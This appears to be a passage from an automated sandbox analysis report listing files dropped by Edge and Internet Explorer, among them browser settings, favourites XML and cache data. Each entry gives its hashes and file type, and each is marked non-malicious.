                                                                                                                                                                            SHA-512:30D0169CBBDD5AFD91706631FE5B0B15EF2932A52FBB42D557343AF552378755770DF9C262BDCE143EFE34655B1085E4C8E5E7E06DFD2D481E51E3CDFE69CBF8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):44656
                                                                                                                                                                            Entropy (8bit):6.09690858578357
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xkBdwuUhDO6vP6OdodUYnMDVvsRncGoup1Xl3jVzXr2:z/Ps+wsI7yOET69odUachu3VlXr4CRo1
                                                                                                                                                                            MD5:F022AD6824D850ED804F4D706A6CE0C8
                                                                                                                                                                            SHA1:8F00920B447308C2FD000F76667E719100FCE94C
                                                                                                                                                                            SHA-256:E10CA710025C58BD2301F503EFFEB227F25452DF095F4E5842A61F21D32FFBEB
                                                                                                                                                                            SHA-512:8424A7ADF7B2F53A88B1F4FDBE198463C054F01309C1FB4C339EC62B1C601B9AE17E8F12F64BCFD8994E2A8F915630EE09B438B20FC795A60D40FD64F282F212
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):44911
                                                                                                                                                                            Entropy (8bit):6.086412147760607
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:OMkbJrT8IeQc5dkSdFuUhDO6vP6OE7t/zuhvsR3XDgh1+wbCAoTGoup1Xl3jVzXb:OMk1rT8H1Vc6Mt/zVkh8wbRoThu3VlXb
                                                                                                                                                                            MD5:8261E1EDA96EB64E45506730BCFF8B18
                                                                                                                                                                            SHA1:6B6CE8AFB405BCCDEFF7B25763BBA4ABAD184216
                                                                                                                                                                            SHA-256:879E2BD8FB6D95475276B14B9F0678266C8CAAE01CE190D0E05282CF6EC0C3CD
                                                                                                                                                                            SHA-512:761D94E69BA1FFE5802E2B69238D945C8AE2AE8A58D84A02463CE1490E5E01BDD50989E1E937E18A9810C5D0A3EB563755846081C543BD0DB9D6AB43727C909F
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):126
                                                                                                                                                                            Entropy (8bit):4.973844138632803
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:D9yRtFwsSxzqC+eAsO2pcIfReYHFk6sOrkHcqTUvFKb:JUF+FqCqd8ZdsOAHqvkb
                                                                                                                                                                            MD5:4BB7A6F899E4F14FE707970F24EC01F1
                                                                                                                                                                            SHA1:28BC1C72CC814347FD4344116ED81B3BFF3F3F37
                                                                                                                                                                            SHA-256:7E161482E9BD934084BD696EEC17AA9C3DB0E0CBC2CD2071377AF41C129C3567
                                                                                                                                                                            SHA-512:575F7BBBD4540B922C354D759D6FD300443953DC8D5C4259BBF65B06CA2FB79B5738B402D116B28D8119AA98910CF1BF8CF6A23F9DA5A68D7457651FE47733CD
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<root><item name="pageVersions" value="{&quot;hp&quot;:&quot;20241209.89&quot;}" ltime="1026719472" htime="31148968" /></root>
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):49120
                                                                                                                                                                            Entropy (8bit):0.0017331682157558962
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Ztt:T
                                                                                                                                                                            MD5:0392ADA071EB68355BED625D8F9695F3
                                                                                                                                                                            SHA1:777253141235B6C6AC92E17E297A1482E82252CC
                                                                                                                                                                            SHA-256:B1313DD95EAF63F33F86F72F09E2ECD700D11159A8693210C37470FCB84038F7
                                                                                                                                                                            SHA-512:EF659EEFCAB16221783ECB258D19801A1FF063478698CF4FCE3C9F98059CA7B1D060B0449E6FD89D3B70439D9735FA1D50088568FF46C9927DE45808250AEC2E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):6144
                                                                                                                                                                            Entropy (8bit):2.3221625035009588
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:rJBGW2SllbaGW2SllbkjllbIYlbfYlbWSllbIYlbfYlbe8bpu9u98bpu9:dl2WJUJJUe8b4C8b4
                                                                                                                                                                            MD5:40C6B8ABBAC4768C44719CF3FC9064A6
                                                                                                                                                                            SHA1:602E7C97D30363FA9B663047B6EC9B61C3EF51FF
                                                                                                                                                                            SHA-256:C7DC9864D3D4D13DD205E2A1E79FE9FCF1CD36598CD28C640831C28AFD45C20D
                                                                                                                                                                            SHA-512:9DD8A8EA55B8C91480F8BDEF79327874D878BC0193334B5FE17CD6F76EA1A1BF680CB5616C087B5271FB37241DD326474A92BD9EDFD65FCF5B2713743A42E542
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                            Category:modified
                                                                                                                                                                            Size (bytes):5632
                                                                                                                                                                            Entropy (8bit):2.2153885156595163
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:rnGD3xB9lj8FZyw0bKvqy6yEyvy5DlsN5Acb9lj8FZywXvqy:rnGTxZ8FZPoKS9LYu0OU8FZPXS
                                                                                                                                                                            MD5:202BE1F5E39FF552C8D18AD864099865
                                                                                                                                                                            SHA1:FBA606957B88D00A24CB3CDA3729045B095681C6
                                                                                                                                                                            SHA-256:5B1CE3859D487C4F1732364F5BB6BF74932CC55535F761495B641C5D3B3C0945
                                                                                                                                                                            SHA-512:65408CF866F3ADF53BBD8F97C74C6016C1A457D70422E4C4214B88EDC2C9E750E8D9DECEFFDE828069512E6CCD3632D07C41A44C3156DB86A1A409B7D196B6E2
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):5632
                                                                                                                                                                            Entropy (8bit):2.2124097051941107
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:rJuwxGv9lj84UZyP01ZKvqy6yEyvy5DlsNUAcb9lj84UZyPXvqy:rwEGb8ZZsKZKS9LYu09U8ZZsXS
                                                                                                                                                                            MD5:ED1EE22A7F234B20A2794672807604E8
                                                                                                                                                                            SHA1:8657FFA2A16A2A29D31601D2B18707D15A17A1D3
                                                                                                                                                                            SHA-256:2BBA2504769F4AC59FEAC95E54F05775562A412B083DE2D30992F00ABAFCE03B
                                                                                                                                                                            SHA-512:BE5D63B3727B5A001654AAF05E61DA36971A7A99EBABF94C394ACAB34C31EAE4A9737B4D165EA659ACE9D031C8DA2E96196712123BD54A97424F9C3A9A35C1F7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (314), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):356
                                                                                                                                                                            Entropy (8bit):5.081328529006832
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:TMVBdc9EMdLD5Ltqc41E4AHo2AHkNTD90/QL3WIZK0QhPPFVDHkEtMjwu:TMHdNMNxOE4L2XNnWimI00ONVbkEtMb
                                                                                                                                                                            MD5:825347CD76B890A1913258A934B50EE8
                                                                                                                                                                            SHA1:987A64543B606A282ECF1F93D6B62915604F808D
                                                                                                                                                                            SHA-256:83345FC698FBCDF937D5319AB30049B077359E832E00B5073A43B38360C92C67
                                                                                                                                                                            SHA-512:5ADD8CF5470ED8E26656D225E0B5A5B65B4F0C9442280B3BE622435B129632B76CC8F71181F59154AF1FB06C43666DC0EDA97AB00A7B6B908B8C3066E7156831
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x40eff9ba,0x01db4ba8</date><accdate>0x40eff9ba,0x01db4ba8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (312), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):354
                                                                                                                                                                            Entropy (8bit):5.1371574669757925
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:TMVBdc9EMdLD5Ltqc4fLGTk4ACAEo2ACAEkNTD90/QL3WIZK0QhPPFkI5kU5EtMb:TMHdNMNxe2k4B82BwNnWimI00ONkak6t
                                                                                                                                                                            MD5:8164AF54518399FBBF76AA940D2131D7
                                                                                                                                                                            SHA1:CC81D0103289EA88041BC1CEA44CCAC1999D4A4B
                                                                                                                                                                            SHA-256:F5128EE8FB5A45D6F63CBA4CD1CDEB4CB6E805FC28A1D844ACC437BDA41CFF5B
                                                                                                                                                                            SHA-512:BF2D13B1D950E63B8F92629474196953C1827B8CE4CB921BBE6B5F07439AB39E26D0A0DCD7FA72971E126C1A7D7813535CB17691F41534F474FA106E49F4FB9B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x40e27280,0x01db4ba8</date><accdate>0x40e27280,0x01db4ba8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (318), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):360
                                                                                                                                                                            Entropy (8bit):5.1437312183853106
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:TMVBdc9EMdLD5Ltqc4GL4gho2ghkNTD90/QL3WIZK0QhPPFyhBcEEtMjwu:TMHdNMNxvL4gW2gWNnWimI00ONmZEtMb
                                                                                                                                                                            MD5:6B2579CC776D68DF6401B5F638C6A073
                                                                                                                                                                            SHA1:426364A948B7C78881573AA6FE054AD012B3E224
                                                                                                                                                                            SHA-256:054D780F1E54460B5A5FEC0C335659A9F2A1B92E28E938E39138CE9B1D8DADE6
                                                                                                                                                                            SHA-512:2A87A862528F3360EFF5BE21CC281DAE403342D07C259AAC2F44536968B8CC6562476A72B85F1AC301CC65DA4B5048136A5ECE1A256B007862EE7D5184C556D7
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x40f266f1,0x01db4ba8</date><accdate>0x40f266f1,0x01db4ba8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (335), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):377
                                                                                                                                                                            Entropy (8bit):5.171265032004802
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:TMVBdc9EMdLD5Ltq08eDPOOKaihMtAXno2AYDbdV3kNTD90/QL3WIZK0QhPPFcE/:TMHdNMNxtDPOOKadX2xbdVUNnWimI00A
                                                                                                                                                                            MD5:BB49DC5BDC6EFA7573A1A350CD6F5F89
                                                                                                                                                                            SHA1:52FA27A09380760272B9B640A22B3406DF45CD65
                                                                                                                                                                            SHA-256:97437BD750E9F212AAA2E6BA68C127301FA22CF4D635158E5C2D31C0D4A0C416
                                                                                                                                                                            SHA-512:B95EAF5A5F8D16EFA7FBCE68FA3F239543CB103323475ADB225F9E4809B7F6643CF659324AACABFFB6A93B68A4225C0A015AE6D2F72651E052124D4BBB1F691D
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://go.microsoft.com/fwlink/p/?LinkId=255142"/><date>0x40e4d1e0,0x01db4ba8</date><accdate>0x40e72453,0x01db4ba8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Bing.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (308), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):350
                                                                                                                                                                            Entropy (8bit):5.1056494230211165
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:TMVBdc9EMdLD5Ltqc4J4Aw9+Oo2Aw9+OkNTD90/QL3WIZK0QhPPFgE5EtMjwu:TMHdNMNxi4UB2UhNnWimI00ONd5EtMb
                                                                                                                                                                            MD5:47D7FA70347781CB1617634ECC04CF24
                                                                                                                                                                            SHA1:4BC29153AE2C0BEADC96613198C935210E564329
                                                                                                                                                                            SHA-256:9A7CE5CDFF3FDBD8C959F3A82F9F2D87E21648A6A0A87FD01182920A4BF7E635
                                                                                                                                                                            SHA-512:A780770CB1FB69E463A3F9E7A21D8FCA0D7F491E150090DE34BD5DA869BFDF09FFDC9D64B4A07B20AB2D583112D4711BFB298649511620C9EA8B3676158B6065
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x40eb555d,0x01db4ba8</date><accdate>0x40eb555d,0x01db4ba8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (314), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):356
                                                                                                                                                                            Entropy (8bit):5.158384996875204
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:TMVBdc9EMdLD5Ltqc4UxGw4gho2XX3kNTD90/QL3WIZK0QhPPF8K0QU5EtMjwu:TMHdNMNxhGw4gW2XXUNnWimI00ON8K0z
                                                                                                                                                                            MD5:B32E3FFA718518AD0E0BE2CC82064E9E
                                                                                                                                                                            SHA1:B761DFB8077EBDA7E9136C3E15149B3C924F84A3
                                                                                                                                                                            SHA-256:4CEF935BCEFC05E81AFC3D9C7C01C789463F5197C663CBC5669B16B718EA4C1E
                                                                                                                                                                            SHA-512:73D02C85256389AF0F18BF8A527D1A841A64D5BE712B7435096D0E0EA6DDF494FAB4D3771349148D324A3B212AEB99181A6AA048A8211904018A3037AEB2A858
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x40f266f1,0x01db4ba8</date><accdate>0x40f4d257,0x01db4ba8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (312), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):354
                                                                                                                                                                            Entropy (8bit):5.122015872322056
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:TMVBdc9EMdLD5Ltqc4Qun4AYo2AYkNTD90/QL3WIZK0QhPPFAkEtMjwu:TMHdNMNx0n4E2YNnWimI00ONxEtMb
                                                                                                                                                                            MD5:2161BF099A2D3321151411B94D8E47A2
                                                                                                                                                                            SHA1:032B0C905027398BEC2A44A9E7DA66EC96AFD0C3
                                                                                                                                                                            SHA-256:73509FF39D15987997794FA393D895F8BA7C52CEB77491E888DF3474BBC08A1A
                                                                                                                                                                            SHA-512:21803B9517577194C664FB0CF9479EF6BCF14427F3FBEB0DC047CA794DDE46781A9C865248FCECF744D93C61A7502D76C568312864A144B615E430EFD2309E1B
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x40edb265,0x01db4ba8</date><accdate>0x40edb265,0x01db4ba8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (314), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):356
                                                                                                                                                                            Entropy (8bit):5.162370536998626
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:TMVBdc9EMdLD5Ltqc4oT4Aw9+Oo2AYkNTD90/QL3WIZK0QhPPF6Kq5EtMjwu:TMHdNMNxx4UB2YNnWimI00ON6Kq5EtMb
                                                                                                                                                                            MD5:01B72D242B3D3A11D1F40C6E8C56D179
                                                                                                                                                                            SHA1:B31E32F4AC6777BE8A765365FAC584F6DCF01572
                                                                                                                                                                            SHA-256:B48E94EAEDCB73DE6780C204D8370BCE1F3AF590AF3BD5BDACB3BDC0EA1E0DE8
                                                                                                                                                                            SHA-512:5DB77F4FA225DC3361119991103B5D56B3BA482EFC3D24655410605D04070B6817FAFCB88332E6728EE53D9B3343D9B8C7201DA1BA252DB2F823BC3284D7BAEF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x40eb555d,0x01db4ba8</date><accdate>0x40edb265,0x01db4ba8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (316), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):358
                                                                                                                                                                            Entropy (8bit):5.130974407109051
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:TMVBdc9EMdLD5Ltqc4YX2n4AYDbdV3o2AYDbdV3kNTD90/QL3WIZK0QhPPF02Cqt:TMHdNMNxc4xbdV42xbdVUNnWimI00ONb
                                                                                                                                                                            MD5:992C5ED56D0B97D3296AEBF98F46BD64
                                                                                                                                                                            SHA1:2B79DFA265D48253C51E909C1610C9969174803B
                                                                                                                                                                            SHA-256:32B093411E4AB9E1633892912C725C950E0468993EABE060ACA5B2235DFCEBC2
                                                                                                                                                                            SHA-512:6C41A41D5FD93F2ED7D395214FB7BEE313F1B1AC5221F3F713BECCDED4E2B4BB8CB106D11821F060AD7237A2DBA65543A076E343E4062F3F631B92200D061833
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x40e72453,0x01db4ba8</date><accdate>0x40e72453,0x01db4ba8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            Process:C:\Program Files\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (312), with CRLF line terminators
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):354
                                                                                                                                                                            Entropy (8bit):5.0837760267912495
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:TMVBdc9EMdLD5Ltqc4In4AcEo2AcEkNTD90/QL3WIZK0QhPPFiwE5EtMjwu:TMHdNMNxfn4Tb2THNnWimI00ONe5EtMb
                                                                                                                                                                            MD5:29D44377D20DC89BE887A241BD1CF44E
                                                                                                                                                                            SHA1:BDB766B4DD15A7B6797C08C70A09F4530B78A2F0
                                                                                                                                                                            SHA-256:09ADAF6E6D6C26E5461D45A9E003B0F1356244542F7684F4ECC6146B37BD83A0
                                                                                                                                                                            SHA-512:76B3B362681F02C8A0F2DC01CFD46C50A53871C5D1DF239914D06CE7C846C02167ACD1AB8324AF3E075BF8FC6D20A767C6A2750FE8A130304E2FBD0724B330B2
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.google.com/"/><date>0x40e980e8,0x01db4ba8</date><accdate>0x40e980e8,0x01db4ba8</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Google.url"/></tile></msapplication></browserconfig>..
                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):8780
                                                                                                                                                                            Entropy (8bit):5.893737476841811
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:192:AYh7TWqFpzTTGjT/VfybZYh7TWqFpzTTGjT/VfybC:ziqFp/Tc/RmkiqFp/Tc/RmC
                                                                                                                                                                            MD5:9F2686FFC8DD77BC7F74F459610AC744
                                                                                                                                                                            SHA1:11719C2623406E6CEE0D642B5642C39AFDA1B44C
                                                                                                                                                                            SHA-256:DCDC0899A069FB9A62F4E46F9B8E596EABC3296C0BDAB64F4C895BB7AAF5BFCB
                                                                                                                                                                            SHA-512:A9C84B8211927D2EC306000BEEC4062EFC0AD739655A08CE916FADF26CD7D018AE5DE2E1B492607AE69771C2AF6B5E94328CF9064171662FA1AA35A21F645408
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:..........h.t.t.p.s.:././.w.w.w...m.s.n...c.o.m./.f.a.v.i.c.o.n...i.c.o...........
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2278
                                                                                                                                                                            Entropy (8bit):3.853521147192857
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:48:uiTrlKxrgxzxl9Il8uxF0UUbf69T+yYX+2s3TMgM0Hsd1rc:myYnQC9SybDblL
                                                                                                                                                                            MD5:99B365A4BBD2B83B2562B2140AA0A12A
                                                                                                                                                                            SHA1:EEF46688085EA13FF20D7BCF84EAA19708FCE3D7
                                                                                                                                                                            SHA-256:9303590A87DAF7C62FB4FD0820654350A0EF75EAD1B57E0E111B3A30059C2EDF
                                                                                                                                                                            SHA-512:BAA5CE7D2801682AFC2302361C19E47518F164539D098C20CE3C36DB9C23DB8E544C2F7AAE072F87F35A97A41304D7077E3FD87DF7616F4C63C547157CDFD925
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.E.a.H.n.L.B.L.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.j.R.j.J.q.U.
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):4622
                                                                                                                                                                            Entropy (8bit):4.001393786606222
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:96:2YnQ/u0ELLgQPyLuqGYTdN3v568ZWpMOksfUrPOg:2P206NqLuqGYhl568oppUh
                                                                                                                                                                            MD5:065F2359A0266BC22060436A9B524A01
                                                                                                                                                                            SHA1:DE03606EF532B5AA1FC09014301F6E738313855E
                                                                                                                                                                            SHA-256:F1AFB9C275B0E122BAC418BBF9B1A8265FDDC81516CB99971F6BFA5B6475FDFC
                                                                                                                                                                            SHA-512:4A2A37685AF392D024AC1B2D07F5B31D4C11C377BF9775FE01F9FE5429A57AE4CDEA920344387CFA7007AEE9DAB563C2DDB773EE57838211E38E469A3630F7CC
                                                                                                                                                                            Malicious:false
